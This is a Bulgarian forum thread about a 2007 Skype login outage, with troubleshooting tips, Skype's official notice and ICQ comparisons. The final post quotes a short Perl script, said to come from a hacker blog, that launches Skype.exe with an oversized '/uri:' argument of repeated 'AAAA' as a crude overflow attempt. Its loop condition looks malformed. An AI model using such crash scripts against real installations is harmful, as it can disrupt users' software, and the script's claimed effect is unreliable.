Проблем със Скайп о_О

FirstBlood

Registered
Здравейте. Имам следния проблем със скайпа:
Не иска да се логне..дава Skype cannot connect
Изключил съм Уиндоуския Firewall, и нямам други.

Реинсталирах го, рестартирах го нищо.

Къде може да е проблема ?

Ако имаш други програми под порт 80 ги изключи, примерно ICQ и подобни, XAMPP също.
Не съм сигурен, но може пък и това да е проблема.

Днес цял ден ми прави проблем този скайп :o И още е така ...

//off
Направо ми идваше по едно време да си взема компа и през джамека долу ... Трябваше да говоря с сестра ми която е в Америка и исках по Скайп да и се обадя ама ... пак се набутах с GSM-а ...

Не е от вашите компове.
и аз имам този проблем както и сума ти други потребители.
в softvisia пише че е от сървърите им.

Тази тема е от днеска прочети я , няма смисал от нова да пускаш :)

http://web-tourist.net/forum/viewtopic.php?t=18953

doki каза:
Ако имаш други програми под порт 80 ги изключи, примерно ICQ и подобни, XAMPP също.
Не съм сигурен, но може пък и това да е проблема.

Нямам XAMPP, нямам ICQ , имам само Windows messenger и го изключих... Същата работа :/

virosh каза:
Тази тема е от днеска прочети я , няма смисал от нова да пускаш :)

http://web-tourist.net/forum/viewtopic.php?t=18953
Вярно..
Скайп каза:
UPDATED 16 August, 2007 14:02 GMT: Some of you may be having problems logging in to Skype. Our engineering team has determined that it’s a software issue. We expect this to be resolved within 12 to 24 hours. Meanwhile, you can simply leave your Skype client running and as soon as the issue is resolved, you will be logged in. We apologize for the inconvenience. Latest updates
Това ме задоволява :)

Тея наистина много яко се издъниха. За разговори по интернет беше the best. Да се надяваме да оправят нещата скоро иначе ICQ-то отново ще си върне лидерските позиции

chebaev каза:
Да се надяваме да оправят нещата скоро иначе ICQ-то отново ще си върне лидерските позиции

Ако питаш мене , не мисля , че ICQ някога е падало от там :)

virosh зависи за какво ползваш Skype. Ако е само за чат просто не струва, ползвам Skype главно за разговори. В тази област с разговорите малко изостават ICQ, въпреки, че в последната версия си е ОК всичко

В някъв хакерски блог било някъв бил казал,че той бил хакнал скайпа.Даже е оставил и кодът:
Код:
#!/usr/bin/perl 
# Simle Code by Maranax Porex ;D 
# Ya Skaypeg!! 

for ($i=256; $i>xCCCCC; $i=$i+256)
{ 
$eot='AAAA' x $i; 
call_sp(); 
} 
exit; 

sub call_sp()
{ 
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; 
system("$str");
}
Който разбира да каже дали кодът е истински.

Back
Горе